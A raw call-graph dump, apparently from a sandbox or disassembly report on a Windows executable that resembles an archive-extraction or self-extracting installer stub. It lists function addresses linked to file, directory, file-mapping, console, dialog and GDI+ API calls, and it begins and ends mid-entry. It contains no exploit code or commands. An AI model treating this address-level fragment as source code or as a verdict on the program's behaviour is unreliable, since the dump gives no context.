37b66c 2 API calls 23562->23566 23563->23565 23565->23433 23567 37a254 23566->23567 23567->23563 23568 37a258 CreateDirectoryW 23567->23568 23568->23561 23568->23563 23570 38e360 23569->23570 23571 37a451 SetFileAttributesW 23570->23571 23572 37a467 23571->23572 23573 37a494 23571->23573 23574 37b66c 2 API calls 23572->23574 23573->23565 23575 37a47b 23574->23575 23575->23573 23576 37a47f SetFileAttributesW 23575->23576 23576->23573 23578 379820 23577->23578 23581 379824 23577->23581 23578->23452 23581->23578 23588 37a12d 23581->23588 23583 3796fa 23582->23583 23584 3796dc 23582->23584 23585 379719 23583->23585 23596 376e3e 74 API calls 23583->23596 23584->23583 23586 3796e8 CloseHandle 23584->23586 23585->23452 23586->23583 23589 38e360 23588->23589 23590 37a13a DeleteFileW 23589->23590 23591 37984c 23590->23591 23592 37a14d 23590->23592 23591->23452 23593 37b66c 2 API calls 23592->23593 23594 37a161 23593->23594 23594->23591 23595 37a165 DeleteFileW 23594->23595 23595->23591 23596->23585 23597->23460 23598->23460 23599->23480 23600->23460 23601->23460 23602->23460 23604 37feba 23603->23604 23632 371789 23604->23632 23606 37fed2 23606->23484 23608 37fead 23607->23608 23609 371789 76 API calls 23608->23609 23610 37fed2 23609->23610 23610->23486 23612 377c72 __EH_prolog 23611->23612 23649 37c827 23612->23649 23614 377c8d 23655 38e24a 23614->23655 23616 377cb7 23661 38440b 23616->23661 23619 377ddf 23621 377de9 23619->23621 23625 377e53 23621->23625 23693 37a4c6 23621->23693 23622 377f06 23622->23490 23623 377ec4 23623->23622 23699 376dc1 74 API calls 23623->23699 23625->23623 23627 37a4c6 8 API calls 23625->23627 23671 37837f 23625->23671 23627->23625 23629 377d09 23628->23629 23631 377d10 23628->23631 23630 381acf 84 API calls 23629->23630 23630->23631 23633 37179f 23632->23633 23642 3717fa __vsnwprintf_l 23632->23642 23634 3717c8 23633->23634 23645 376e91 74 API calls __vswprintf_c_l 23633->23645 23636 371827 23634->23636 23641 3717e7 new 23634->23641 23638 3935de 22 API calls 23636->23638 23637 3717be 23646 376efd 75 API calls 23637->23646 23640 37182e 23638->23640 23640->23642 23648 376efd 75 API calls 23640->23648 23641->23642 23647 376efd 75 API calls 23641->23647 23642->23606 23645->23637 23646->23634 23647->23642 23648->23642 23650 37c831 __EH_prolog 23649->23650 23651 38e24a new 8 API calls 23650->23651 23652 37c874 23651->23652 23653 38e24a new 8 API calls 23652->23653 23654 37c898 23653->23654 23654->23614 23657 38e24f new 23655->23657 23656 38e27b 23656->23616 23657->23656 23667 3971ad 7 API calls 2 library calls 23657->23667 23668 38ecce RaiseException FindHandler new 23657->23668 23669 38ecb1 RaiseException Concurrency::cancel_current_task FindHandler 23657->23669 23662 384415 __EH_prolog 23661->23662 23663 38e24a new 8 API calls 23662->23663 23664 384431 23663->23664 23665 377ce6 23664->23665 23670 3806ba 78 API calls 23664->23670 23665->23619 23667->23657 23670->23665 23672 378389 __EH_prolog 23671->23672 23700 371380 23672->23700 23674 3783a4 23708 379ef7 23674->23708 23680 3783d3 23831 371631 23680->23831 23681 37846e 23727 378517 23681->23727 23685 3784ce 23734 371f00 23685->23734 23686 3783cf 23686->23680 23686->23681 23691 37a4c6 8 API calls 23686->23691 23835 37bac4 CompareStringW 23686->23835 23689 3784d9 23689->23680 23738 373aac 23689->23738 23748 37857b 23689->23748 23691->23686 23694 37a4db 23693->23694 23698 37a4df 23694->23698 24089 37a5f4 23694->24089 23696 37a4ef 23697 37a4f4 FindClose 23696->23697 23696->23698 23697->23698 23698->23621 23699->23622 23701 371385 __EH_prolog 23700->23701 23702 37c827 8 API calls 23701->23702 23703 3713bd 23702->23703 23704 38e24a new 8 API calls 23703->23704 23707 371416 ___scrt_fastfail 23703->23707 23705 371403 23704->23705 23705->23707 23836 37b07d 23705->23836 23707->23674 23709 379f0e 23708->23709 23710 3783ba 23709->23710 23852 376f5d 76 API calls 23709->23852 23710->23680 23712 3719a6 23710->23712 23713 3719b0 __EH_prolog 23712->23713 23723 371a00 23713->23723 23726 3719e5 23713->23726 23853 37709d 23713->23853 23715 371b60 23718 373aac 97 API calls 23715->23718 23715->23726 23716 371b50 23856 376dc1 74 API calls 23716->23856 23720 371bb3 23718->23720 23719 371bff 23725 371c32 23719->23725 23719->23726 23857 376dc1 74 API calls 23719->23857 23720->23719 23722 373aac 97 API calls 23720->23722 23722->23720 23723->23715 23723->23716 23723->23726 23724 373aac 97 API calls 23724->23725 23725->23724 23725->23726 23726->23686 23728 378524 23727->23728 23875 380c26 GetSystemTime SystemTimeToFileTime 23728->23875 23730 378488 23730->23685 23731 381359 23730->23731 23877 38d51a 23731->23877 23735 371f05 __EH_prolog 23734->23735 23736 371f39 23735->23736 23885 371951 23735->23885 23736->23689 23739 373abc 23738->23739 23740 373ab8 23738->23740 23741 373af7 23739->23741 23742 373ae9 23739->23742 23740->23689 24020 3727e8 97 API calls 3 library calls 23741->24020 23743 373b29 23742->23743 24019 373281 85 API calls 3 library calls 23742->24019 23743->23689 23746 373af5 23746->23743 24021 37204e 74 API calls 23746->24021 23749 378585 __EH_prolog 23748->23749 23750 3785be 23749->23750 23762 3785c2 23749->23762 24044 3884bd 99 API calls 23749->24044 23751 3785e7 23750->23751 23756 37867a 23750->23756 23750->23762 23753 378609 23751->23753 23751->23762 24045 377b66 151 API calls 23751->24045 23753->23762 24046 3884bd 99 API calls 23753->24046 23756->23762 24022 375e3a 23756->24022 23758 378705 23758->23762 24028 37826a 23758->24028 23761 378875 23763 37a4c6 8 API calls 23761->23763 23766 3788e0 23761->23766 23762->23689 23763->23766 23765 37c991 80 API calls 23769 37893b _memcmp 23765->23769 24032 377d6c 23766->24032 23767 378a70 23768 378b43 23767->23768 23774 378abf 23767->23774 23773 378b9e 23768->23773 23783 378b4e 23768->23783 23769->23762 23769->23765 23769->23767 23770 378a69 23769->23770 24047 378236 82 API calls 23769->24047 24048 371f94 74 API calls 23769->24048 24049 371f94 74 API calls 23770->24049 23782 378b30 23773->23782 24052 3780ea 96 API calls 23773->24052 23776 37a180 4 API calls 23774->23776 23774->23782 23775 378b9c 23777 379653 79 API calls 23775->23777 23780 378af7 23776->23780 23777->23762 23779 379653 79 API calls 23779->23762 23780->23782 24050 379377 96 API calls 23780->24050 23781 378c09 23794 378c74 23781->23794 23820 3791c1 __except_handler4 23781->23820 24053 379989 23781->24053 23782->23775 23782->23781 23783->23775 24051 377f26 100 API calls __except_handler4 23783->24051 23784 37aa88 8 API calls 23787 378cc3 23784->23787 23790 37aa88 8 API calls 23787->23790 23789 378c4c 23789->23794 24057 371f94 74 API calls 23789->24057 23812 378cd9 23790->23812 23792 378c62 24058 377061 75 API calls 23792->24058 23794->23784 23795 378df7 23798 378e69 23795->23798 23799 378e07 23795->23799 23796 378efd 23801 378f23 23796->23801 23802 378f0f 23796->23802 23818 378e27 23796->23818 23797 378d9c 23797->23795 23797->23796 23800 37826a CharUpperW 23798->23800 23803 378e4d 23799->23803 23811 378e15 23799->23811 23804 378e84 23800->23804 23806 382c42 75 API calls 23801->23806 23805 3792e6 121 API calls 23802->23805 23803->23818 24061 377907 108 API calls 23803->24061 23814 378eb4 23804->23814 23815 378ead 23804->23815 23804->23818 23805->23818 23807 378f3c 23806->23807 24064 3828f1 121 API calls 23807->24064 24060 371f94 74 API calls 23811->24060 23812->23797 24059 379b21 SetFilePointer GetLastError SetEndOfFile 23812->24059 24063 379224 94 API calls __EH_prolog 23814->24063 24062 377698 84 API calls __except_handler4 23815->24062 23824 37904b 23818->23824 24065 371f94 74 API calls 23818->24065 23820->23779 23821 379104 24039 379d62 23821->24039 23822 37a444 4 API calls 23823 3791b1 23822->23823 23823->23820 24066 371f94 74 API calls 23823->24066 23824->23820 23824->23821 23830 379156 23824->23830 24038 379ebf SetEndOfFile 23824->24038 23827 37914b 23829 3796d0 75 API calls 23827->23829 23829->23830 23830->23820 23830->23822 23832 371643 23831->23832 24081 37c8ca 23832->24081 23835->23686 23837 37b087 __EH_prolog 23836->23837 23842 37ea80 80 API calls 23837->23842 23839 37b099 23843 37b195 23839->23843 23842->23839 23844 37b1a7 ___scrt_fastfail 23843->23844 23847 380948 23844->23847 23850 380908 GetCurrentProcess GetProcessAffinityMask 23847->23850 23851 37b10f 23850->23851 23851->23707 23852->23710 23858 3716d2 23853->23858 23855 3770b9 23855->23723 23856->23726 23857->23725 23859 371740 __vsnwprintf_l 23858->23859 23860 3716e8 23858->23860 23859->23855 23861 371711 23860->23861 23871 376e91 74 API calls __vswprintf_c_l 23860->23871 23863 371767 23861->23863 23868 37172d new 23861->23868 23865 3935de 22 API calls 23863->23865 23864 371707 23872 376efd 75 API calls 23864->23872 23867 37176e 23865->23867 23867->23859 23874 376efd 75 API calls 23867->23874 23868->23859 23873 376efd 75 API calls 23868->23873 23871->23864 23872->23861 23873->23859 23874->23859 23876 380c56 __vsnwprintf_l 23875->23876 23876->23730 23878 38d527 23877->23878 23879 37ddd1 53 API calls 23878->23879 23880 38d54a 23879->23880 23881 37400a _swprintf 51 API calls 23880->23881 23882 38d55c 23881->23882 23883 38cb5a 16 API calls 23882->23883 23884 381372 23883->23884 23884->23685 23886 371961 23885->23886 23888 37195d 23885->23888 23889 371896 23886->23889 23888->23736 23890 3718e5 23889->23890 23891 3718a8 23889->23891 23897 373f18 23890->23897 23892 373aac 97 API calls 23891->23892 23895 3718c8 23892->23895 23895->23888 23898 373f21 23897->23898 23899 373aac 97 API calls 23898->23899 23901 371906 23898->23901 23914 38067c 23898->23914 23899->23898 23901->23895 23902 371e00 23901->23902 23903 371e0a __EH_prolog 23902->23903 23922 373b3d 23903->23922 23905 371e34 23906 3716d2 76 API calls 23905->23906 23908 371ebb 23905->23908 23907 371e4b 23906->23907 23950 371849 76 API calls 23907->23950 23908->23895 23910 371e63 23912 371e6f 23910->23912 23951 38137a MultiByteToWideChar 23910->23951 23952 371849 76 API calls 23912->23952 23915 380683 23914->23915 23916 38069e 23915->23916 23920 376e8c RaiseException FindHandler 23915->23920 23918 3806af SetThreadExecutionState 23916->23918 23921 376e8c RaiseException FindHandler 23916->23921 23918->23898 23920->23916 23921->23918 23923 373b47 __EH_prolog 23922->23923 23924 373b5d 23923->23924 23925 373b79 23923->23925 23981 376dc1 74 API calls 23924->23981 23926 373dc2 23925->23926 23930 373ba5 23925->23930 23998 376dc1 74 API calls 23926->23998 23929 373b68 23929->23905 23930->23929 23953 382c42 23930->23953 23932 373c26 23933 373cb1 23932->23933 23949 373c1d 23932->23949 23984 37c991 23932->23984 23966 37aa88 23933->23966 23934 373c22 23934->23932 23983 372034 76 API calls 23934->23983 23935 373bf4 23935->23932 23935->23934 23936 373c12 23935->23936 23982 376dc1 74 API calls 23936->23982 23938 373cc4 23943 373d3e 23938->23943 23944 373d48 23938->23944 23970 3792e6 23943->23970 23990 3828f1 121 API calls 23944->23990 23947 373d46 23947->23949 23991 371f94 74 API calls 23947->23991 23992 381acf 23949->23992 23950->23910 23951->23912 23952->23908 23954 382c51 23953->23954 23956 382c5b 23953->23956 23999 376efd 75 API calls 23954->23999 23958 382ca2 new 23956->23958 23959 382c9d Concurrency::cancel_current_task 23956->23959 23965 382cfd ___scrt_fastfail 23956->23965 23957 382da9 Concurrency::cancel_current_task 24002 39157a RaiseException 23957->24002 23958->23957 23961 382cd9 23958->23961 23958->23965 24001 39157a RaiseException 23959->24001 24000 382b7b 75 API calls 4 library calls 23961->24000 23964 382dc1 23965->23935 23965->23965 23967 37aa95 23966->23967 23969 37aa9f 23966->23969 23968 38e24a new 8 API calls 23967->23968 23968->23969 23969->23938 23971 3792f0 __EH_prolog 23970->23971 24003 377dc6 23971->24003 23974 37709d 76 API calls 23975 379302 23974->23975 24006 37ca6c 23975->24006 23977 37935c 23977->23947 23979 37ca6c 114 API calls 23980 379314 23979->23980 23980->23977 23980->23979 24015 37cc51 97 API calls __vsnwprintf_l 23980->24015 23981->23929 23982->23949 23983->23932 23985 37c9c4 23984->23985 23986 37c9b2 23984->23986 24017 376249 80 API calls 23985->24017 24016 376249 80 API calls 23986->24016 23989 37c9bc 23989->23933 23990->23947 23991->23949 23993 381ad9 23992->23993 23994 381af2 23993->23994 23997 381b06 23993->23997 24018 38075b 84 API calls 23994->24018 23996 381af9 23996->23997 23998->23929 23999->23956 24000->23965 24001->23957 24002->23964 24004 37acf5 GetVersionExW 24003->24004 24005 377dcb 24004->24005 24005->23974 24012 37ca82 __vsnwprintf_l 24006->24012 24007 37cbf7 24008 37cc1f 24007->24008 24009 37ca0b 6 API calls 24007->24009 24010 38067c SetThreadExecutionState RaiseException 24008->24010 24009->24008 24013 37cbee 24010->24013 24011 3884bd 99 API calls 24011->24012 24012->24007 24012->24011 24012->24013 24014 37ab70 89 API calls 24012->24014 24013->23980 24014->24012 24015->23980 24016->23989 24017->23989 24018->23996 24019->23746 24020->23746 24021->23743 24023 375e4a 24022->24023 24067 375d67 24023->24067 24026 375e7d 24027 375eb5 24026->24027 24072 37ad65 CharUpperW CompareStringW 24026->24072 24027->23758 24029 378289 24028->24029 24078 38179d CharUpperW 24029->24078 24031 378333 24031->23761 24033 377d7b 24032->24033 24034 377dbb 24033->24034 24079 377043 74 API calls 24033->24079 24034->23769 24036 377db3 24080 376dc1 74 API calls 24036->24080 24038->23821 24040 379d73 24039->24040 24041 379d82 24039->24041 24040->24041 24042 379d79 FlushFileBuffers 24040->24042 24043 379dfb SetFileTime 24041->24043 24042->24041 24043->23827 24044->23750 24045->23753 24046->23762 24047->23769 24048->23769 24049->23767 24050->23782 24051->23775 24052->23782 24054 379992 GetFileType 24053->24054 24055 37998f 24053->24055 24056 3799a0 24054->24056 24055->23789 24056->23789 24057->23792 24058->23794 24059->23797 24060->23818 24061->23818 24062->23818 24063->23818 24064->23818 24065->23824 24066->23820 24073 375c64 24067->24073 24069 375d88 24069->24026 24071 375c64 2 API calls 24071->24069 24072->24026 24074 375c6e 24073->24074 24076 375d56 24074->24076 24077 37ad65 CharUpperW CompareStringW 24074->24077 24076->24069 24076->24071 24077->24074 24078->24031 24079->24036 24080->24034 24082 37c8db 24081->24082 24087 37a90e 84 API calls 24082->24087 24084 37c90d 24088 37a90e 84 API calls 24084->24088 24086 37c918 24087->24084 24088->24086 24090 37a5fe 24089->24090 24091 37a691 FindNextFileW 24090->24091 24092 37a621 FindFirstFileW 24090->24092 24093 37a6b0 24091->24093 24094 37a69c GetLastError 24091->24094 24095 37a638 24092->24095 24100 37a675 24092->24100 24093->24100 24094->24093 24096 37b66c 2 API calls 24095->24096 24097 37a64d 24096->24097 24098 37a651 FindFirstFileW 24097->24098 24099 37a66a GetLastError 24097->24099 24098->24099 24098->24100 24099->24100 24100->23696 24110 389d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24101->24110 24103 389d21 24104 389d2d 24103->24104 24111 389d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24103->24111 24104->23497 24104->23498 24106->23501 24107->23507 24108->23507 24109->23510 24110->24103 24111->24104 24112->23518 24114 379ef7 76 API calls 24113->24114 24115 371f5b 24114->24115 24116 3719a6 97 API calls 24115->24116 24119 371f78 24115->24119 24117 371f68 24116->24117 24117->24119 24120 376dc1 74 API calls 24117->24120 24119->23526 24119->23527 24120->24119 24783 38b8e0 93 API calls _swprintf 24784 388ce0 6 API calls 24787 3a16e0 CloseHandle 24124 3710d5 24129 375bd7 24124->24129 24130 375be1 __EH_prolog 24129->24130 24131 37b07d 82 API calls 24130->24131 24132 375bed 24131->24132 24136 375dcc GetCurrentProcess GetProcessAffinityMask 24132->24136 24788 38acd0 100 API calls 24831 3819d0 26 API calls std::bad_exception::bad_exception 24144 38ead2 24145 38eade CallCatchBlock 24144->24145 24170 38e5c7 24145->24170 24147 38eae5 24149 38eb0e 24147->24149 24250 38ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 24147->24250 24154 38eb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24149->24154 24181 39824d 24149->24181 24153 38eb2d CallCatchBlock 24160 38ebad 24154->24160 24251 397243 38 API calls 3 library calls 24154->24251 24189 38f020 24160->24189 24165 38ebd9 24166 38ebe2 24165->24166 24252 39764a 28 API calls _abort 24165->24252 24253 38e73e 13 API calls 2 library calls 24166->24253 24171 38e5d0 24170->24171 24254 38ed5b IsProcessorFeaturePresent 24171->24254 24173 38e5dc 24255 392016 24173->24255 24175 38e5e1 24176 38e5e5 24175->24176 24264 3980d7 24175->24264 24176->24147 24179 38e5fc 24179->24147 24182 398264 24181->24182 24183 38ec4a DloadUnlock 5 API calls 24182->24183 24184 38eb27 24183->24184 24184->24153 24185 3981f1 24184->24185 24187 398220 24185->24187 24186 38ec4a DloadUnlock 5 API calls 24188 398249 24186->24188 24187->24186 24188->24154 24314 38f350 24189->24314 24192 38ebb3 24193 39819e 24192->24193 24316 39b290 24193->24316 24195 38ebbc 24198 38d5d4 24195->24198 24196 3981a7 24196->24195 24320 39b59a 38 API calls 24196->24320 24441 3800cf 24198->24441 24202 38d5f3 24490 38a335 24202->24490 24204 38d5fc 24494 3813b3 GetCPInfo 24204->24494 24206 38d606 ___scrt_fastfail 24207 38d619 GetCommandLineW 24206->24207 24208 38d628 24207->24208 24209 38d6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24207->24209 24497 38bc84 24208->24497 24210 37400a _swprintf 51 API calls 24209->24210 24212 38d70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24210->24212 24508 38aded LoadBitmapW 24212->24508 24215 38d6a0 24502 38d287 24215->24502 24216 38d636 OpenFileMappingW 24217 38d64f MapViewOfFile 24216->24217 24218 38d696 CloseHandle 24216->24218 24221 38d68d UnmapViewOfFile 24217->24221 24222 38d660 __vsnwprintf_l 24217->24222 24218->24209 24221->24218 24227 38d287 2 API calls 24222->24227 24229 38d67c 24227->24229 24228 388835 8 API calls 24230 38d76a DialogBoxParamW 24228->24230 24229->24221 24231 38d7a4 24230->24231 24232 38d7bd 24231->24232 24233 38d7b6 Sleep 24231->24233 24236 38d7cb 24232->24236 24538 38a544 CompareStringW SetCurrentDirectoryW ___scrt_fastfail 24232->24538 24233->24232 24235 38d7ea DeleteObject 24237 38d7ff DeleteObject 24235->24237 24238 38d806 24235->24238 24236->24235 24237->24238 24239 38d849 24238->24239 24240 38d837 24238->24240 24535 38a39d 24239->24535 24539 38d2e6 6 API calls 24240->24539 24243 38d83d CloseHandle 24243->24239 24244 38d883 24245 39757e GetModuleHandleW 24244->24245 24246 38ebcf 24245->24246 24246->24165 24247 3976a7 24246->24247 24675 397424 24247->24675 24250->24147 24251->24160 24252->24166 24253->24153 24254->24173 24256 39201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 24255->24256 24268 39310e 24256->24268 24259 392029 24259->24175 24261 392031 24262 39203c 24261->24262 24282 39314a DeleteCriticalSection 24261->24282 24262->24175 24310 39b73a 24264->24310 24267 39203f 8 API calls 3 library calls 24267->24176 24269 393117 24268->24269 24271 393140 24269->24271 24272 392025 24269->24272 24283 393385 24269->24283 24288 39314a DeleteCriticalSection 24271->24288 24272->24259 24274 39215c 24272->24274 24303 39329a 24274->24303 24276 392166 24281 392171 24276->24281 24308 393348 6 API calls try_get_function 24276->24308 24278 39217f 24279 39218c 24278->24279 24309 39218f 6 API calls ___vcrt_FlsFree 24278->24309 24279->24261 24281->24261 24282->24259 24289 393179 24283->24289 24286 3933bc InitializeCriticalSectionAndSpinCount 24287 3933a8 24286->24287 24287->24269 24288->24272 24290 3931ad 24289->24290 24293 3931a9 24289->24293 24290->24286 24290->24287 24291 3931cd 24291->24290 24294 3931d9 GetProcAddress 24291->24294 24293->24290 24293->24291 24296 393219 24293->24296 24295 3931e9 __crt_fast_encode_pointer 24294->24295 24295->24290 24297 393241 LoadLibraryExW 24296->24297 24302 393236 24296->24302 24298 39325d GetLastError 24297->24298 24299 393275 24297->24299 24298->24299 24300 393268 LoadLibraryExW 24298->24300 24301 39328c FreeLibrary 24299->24301 24299->24302 24300->24299 24301->24302 24302->24293 24304 393179 try_get_function 5 API calls 24303->24304 24305 3932b4 24304->24305 24306 3932cc TlsAlloc 24305->24306 24307 3932bd 24305->24307 24307->24276 24308->24278 24309->24281 24313 39b753 24310->24313 24311 38ec4a DloadUnlock 5 API calls 24312 38e5ee 24311->24312 24312->24179 24312->24267 24313->24311 24315 38f033 GetStartupInfoW 24314->24315 24315->24192 24317 39b299 24316->24317 24319 39b2a2 24316->24319 24321 39b188 24317->24321 24319->24196 24320->24196 24322 398fa5 pre_c_initialization 38 API calls 24321->24322 24323 39b195 24322->24323 24341 39b2ae 24323->24341 24325 39b19d 24350 39af1b 24325->24350 24328 39b1b4 24328->24319 24329 398518 __vsnwprintf_l 21 API calls 24330 39b1c5 24329->24330 24340 39b1f7 24330->24340 24357 39b350 24330->24357 24333 3984de _free 20 API calls 24333->24328 24334 39b20f 24337 39b23b 24334->24337 24338 3984de _free 20 API calls 24334->24338 24335 39b1f2 24367 39895a 20 API calls _free 24335->24367 24337->24340 24368 39adf1 26 API calls 24337->24368 24338->24337 24340->24333 24342 39b2ba CallCatchBlock 24341->24342 24343 398fa5 pre_c_initialization 38 API calls 24342->24343 24345 39b2c4 24343->24345 24346 39b348 CallCatchBlock 24345->24346 24349 3984de _free 20 API calls 24345->24349 24369 398566 38 API calls _abort 24345->24369 24370 39a3f1 EnterCriticalSection 24345->24370 24371 39b33f LeaveCriticalSection _abort 24345->24371 24346->24325 24349->24345 24351 393dd6 __cftof 38 API calls 24350->24351 24352 39af2d 24351->24352 24353 39af3c GetOEMCP 24352->24353 24354 39af4e 24352->24354 24355 39af65 24353->24355 24354->24355 24356 39af53 GetACP 24354->24356 24355->24328 24355->24329 24356->24355 24358 39af1b 40 API calls 24357->24358 24359 39b36f 24358->24359 24361 39b3c0 IsValidCodePage 24359->24361 24364 39b376 24359->24364 24366 39b3e5 ___scrt_fastfail 24359->24366 24360 38ec4a DloadUnlock 5 API calls 24362 39b1ea 24360->24362 24363 39b3d2 GetCPInfo 24361->24363 24361->24364 24362->24334 24362->24335 24363->24364 24363->24366 24364->24360 24372 39aff4 GetCPInfo 24366->24372 24367->24340 24368->24340 24370->24345 24371->24345 24373 39b0d8 24372->24373 24377 39b02e 24372->24377 24376 38ec4a DloadUnlock 5 API calls 24373->24376 24379 39b184 24376->24379 24382 39c099 24377->24382 24379->24364 24381 39a275 __vsnwprintf_l 43 API calls 24381->24373 24383 393dd6 __cftof 38 API calls 24382->24383 24384 39c0b9 MultiByteToWideChar 24383->24384 24386 39c18f 24384->24386 24388 39c0f7 24384->24388 24389 38ec4a DloadUnlock 5 API calls 24386->24389 24387 39c118 __vsnwprintf_l ___scrt_fastfail 24390 39c189 24387->24390 24394 39c15d MultiByteToWideChar 24387->24394 24388->24387 24391 398518 __vsnwprintf_l 21 API calls 24388->24391 24392 39b08f 24389->24392 24401 39a2c0 20 API calls _free 24390->24401 24391->24387 24396 39a275 24392->24396 24394->24390 24395 39c179 GetStringTypeW 24394->24395 24395->24390 24397 393dd6 __cftof 38 API calls 24396->24397 24398 39a288 24397->24398 24402 39a058 24398->24402 24401->24386 24404 39a073 __vsnwprintf_l 24402->24404 24403 39a099 MultiByteToWideChar 24405 39a24d 24403->24405 24406 39a0c3 24403->24406 24404->24403 24407 38ec4a DloadUnlock 5 API calls 24405->24407 24411 398518 __vsnwprintf_l 21 API calls 24406->24411 24413 39a0e4 __vsnwprintf_l 24406->24413 24408 39a260 24407->24408 24408->24381 24409 39a12d MultiByteToWideChar 24410 39a199 24409->24410 24412 39a146 24409->24412 24438 39a2c0 20 API calls _free 24410->24438 24411->24413 24429 39a72c 24412->24429 24413->24409 24413->24410 24417 39a1a8 24419 398518 __vsnwprintf_l 21 API calls 24417->24419 24423 39a1c9 __vsnwprintf_l 24417->24423 24418 39a170 24418->24410 24421 39a72c __vsnwprintf_l 11 API calls 24418->24421 24419->24423 24420 39a23e 24437 39a2c0 20 API calls _free 24420->24437 24421->24410 24423->24420 24424 39a72c __vsnwprintf_l 11 API calls 24423->24424 24425 39a21d 24424->24425 24425->24420 24426 39a22c WideCharToMultiByte 24425->24426 24426->24420 24427 39a26c 24426->24427 24439 39a2c0 20 API calls _free 24427->24439 24430 39a458 _free 5 API calls 24429->24430 24431 39a753 24430->24431 24433 39a75c 24431->24433 24440 39a7b4 10 API calls 3 library calls 24431->24440 24435 38ec4a DloadUnlock 5 API calls 24433->24435 24434 39a79c LCMapStringW 24434->24433 24436 39a15d 24435->24436 24436->24410 24436->24417 24436->24418 24437->24410 24438->24405 24439->24410 24440->24434 24442 38e360 24441->24442 24443 3800d9 GetModuleHandleW 24442->24443 24444 3800f0 GetProcAddress 24443->24444 24445 380154 24443->24445 24446 380109 24444->24446 24447 380121 GetProcAddress 24444->24447 24448 380484 GetModuleFileNameW 24445->24448 24549 3970dd 42 API calls __vsnwprintf_l 24445->24549 24446->24447 24447->24445 24449 380133 24447->24449 24461 3804a3 24448->24461 24449->24445 24451 3803be 24451->24448 24452 3803c9 GetModuleFileNameW CreateFileW 24451->24452 24453 380478 CloseHandle 24452->24453 24454 3803fc SetFilePointer 24452->24454 24453->24448 24454->24453 24455 38040c ReadFile 24454->24455 24455->24453 24458 38042b 24455->24458 24458->24453 24460 380085 2 API calls 24458->24460 24459 3804d2 CompareStringW 24459->24461 24460->24458 24461->24459 24462 380508 GetFileAttributesW 24461->24462 24463 380520 24461->24463 24540 37acf5 24461->24540 24543 380085 24461->24543 24462->24461 24462->24463 24464 38052a 24463->24464 24467 380560 24463->24467 24466 380542 GetFileAttributesW 24464->24466 24468 38055a 24464->24468 24465 38066f 24489 389da4 GetCurrentDirectoryW 24465->24489 24466->24464 24466->24468 24467->24465 24469 37acf5 GetVersionExW 24467->24469 24468->24467 24470 38057a 24469->24470 24471 380581 24470->24471 24472 3805e7 24470->24472 24474 380085 2 API calls 24471->24474 24473 37400a _swprintf 51 API calls 24472->24473 24475 38060f AllocConsole 24473->24475 24476 38058b 24474->24476 24477 38061c GetCurrentProcessId AttachConsole 24475->24477 24478 380667 ExitProcess 24475->24478 24479 380085 2 API calls 24476->24479 24550 3935b3 24477->24550 24480 380595 24479->24480 24482 37ddd1 53 API calls 24480->24482 24484 3805b0 24482->24484 24483 38063d GetStdHandle WriteConsoleW Sleep FreeConsole 24483->24478 24485 37400a _swprintf 51 API calls 24484->24485 24486 3805c3 24485->24486 24487 37ddd1 53 API calls 24486->24487 24488 3805d2 24487->24488 24488->24478 24489->24202 24491 380085 2 API calls 24490->24491 24492 38a349 OleInitialize 24491->24492 24493 38a36c GdiplusStartup SHGetMalloc 24492->24493 24493->24204 24495 3813d7 IsDBCSLeadByte 24494->24495 24495->24495 24496 3813ef 24495->24496 24496->24206 24498 38bc8e 24497->24498 24499 38bda4 24498->24499 24500 38179d CharUpperW 24498->24500 24552 37ecad 80 API calls ___scrt_fastfail 24498->24552 24499->24215 24499->24216 24500->24498 24503 38e360 24502->24503 24504 38d294 SetEnvironmentVariableW 24503->24504 24506 38d2b7 24504->24506 24505 38d2df 24505->24209 24506->24505 24507 38d2d3 SetEnvironmentVariableW 24506->24507 24507->24505 24509 38ae0e 24508->24509 24510 38ae15 24508->24510 24553 389e1c FindResourceW 24509->24553 24512 38ae2a 24510->24512 24513 38ae1b GetObjectW 24510->24513 24514 389d1a 4 API calls 24512->24514 24513->24512 24515 38ae3d 24514->24515 24516 38ae80 24515->24516 24517 38ae5c 24515->24517 24518 389e1c 13 API calls 24515->24518 24527 37d31c 24516->24527 24569 389d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24517->24569 24520 38ae4d 24518->24520 24520->24517 24522 38ae53 DeleteObject 24520->24522 24521 38ae64 24570 389d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24521->24570 24522->24517 24524 38ae6d 24571 389f5d 8 API calls ___scrt_fastfail 24524->24571 24526 38ae74 DeleteObject 24526->24516 24580 37d341 24527->24580 24529 37d328 24620 37da4e GetModuleHandleW FindResourceW 24529->24620 24532 388835 24533 38e24a new 8 API calls 24532->24533 24534 388854 24533->24534 24534->24228 24536 38a3cc GdiplusShutdown CoUninitialize 24535->24536 24536->24244 24538->24236 24539->24243 24541 37ad09 GetVersionExW 24540->24541 24542 37ad45 24540->24542 24541->24542 24542->24461 24544 38e360 24543->24544 24545 380092 GetSystemDirectoryW 24544->24545 24546 3800c8 24545->24546 24547 3800aa 24545->24547 24546->24461 24548 3800bb LoadLibraryW 24547->24548 24548->24546 24549->24451 24551 3935bb 24550->24551 24551->24483 24551->24551 24552->24498 24554 389e3e SizeofResource 24553->24554 24555 389e70 24553->24555 24554->24555 24556 389e52 LoadResource 24554->24556 24555->24510 24556->24555 24557 389e63 LockResource 24556->24557 24557->24555 24558 389e77 GlobalAlloc 24557->24558 24558->24555 24559 389e92 GlobalLock 24558->24559 24560 389f21 GlobalFree 24559->24560 24561 389ea1 __vsnwprintf_l 24559->24561 24560->24555 24562 389ea9 CreateStreamOnHGlobal 24561->24562 24563 389f1a GlobalUnlock 24562->24563 24564 389ec1 24562->24564 24563->24560 24572 389d7b GdipAlloc 24564->24572 24567 389f05 24567->24563 24568 389eef GdipCreateHBITMAPFromBitmap 24568->24567 24569->24521 24570->24524 24571->24526 24573 389d9a 24572->24573 24574 389d8d 24572->24574 24573->24563 24573->24567 24573->24568 24576 389b0f 24574->24576 24577 389b30 GdipCreateBitmapFromStreamICM 24576->24577 24578 389b37 GdipCreateBitmapFromStream 24576->24578 24579 389b3c 24577->24579 24578->24579 24579->24573 24581 37d34b _wcschr __EH_prolog 24580->24581 24582 37d37a GetModuleFileNameW 24581->24582 